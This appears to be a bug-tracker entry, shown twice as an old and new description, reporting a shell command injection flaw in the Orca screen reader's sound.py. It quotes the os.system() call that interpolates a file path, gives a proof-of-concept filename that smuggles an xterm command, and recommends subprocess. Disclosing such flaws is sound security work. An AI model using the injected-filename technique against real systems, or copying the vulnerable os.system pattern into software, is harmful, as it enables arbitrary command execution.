| 2015-07-23 19:11:16 |
Bernd Dietzel |
description |
The python3 Orca module named "sound" can be used to inject Shell Commands.
File :
/usr/lib/python3/dist-packages/orca/sound.py
The os.system() call in the sound.py file uses self.path wich is the attac verctor.
line 49-53 :
import os
os.system(
'gst-launch filesrc location="%s" ! wavparse '\
'! autoaudiosink > /dev/null 2>&1 &'\
% self._path) ######## < ------- Here is the Problem #######
--------
Exploid Demo wich runs the program xterm when a bad pathname is used to play a sound :
theregrunner@mint17 : ~ $ python3
Python 3.4.0 (default, Jun 19 2015, 14:18:46)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from orca import sound
>>> self=sound.Sound
>>> self.__init__(self,'";xterm; #.mp3')
>>> self.play(self)
------------
See the attached screenshot
Please use subprocess , not os.system.
Thank you :-) |
The python3 Orca module named "sound" can be used to inject Shell Commands.
File :
/usr/lib/python3/dist-packages/orca/sound.py
The os.system() call in the sound.py file uses self.path wich is the attac verctor.
line 49-53 :
import os
os.system(
'gst-launch filesrc location="%s" ! wavparse '\
'! autoaudiosink > /dev/null 2>&1 &'\
% self._path) ######## < ------- Here is the Problem
--------
Exploid Demo wich runs the program xterm when a bad pathname is used to play a sound :
theregrunner@mint17 : ~ $ python3
Python 3.4.0 (default, Jun 19 2015, 14:18:46)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from orca import sound
>>> self=sound.Sound
>>> self.__init__(self,'";xterm; #.mp3')
>>> self.play(self)
------------
See the attached screenshot
Please use subprocess , not os.system.
Thank you :-) |
|
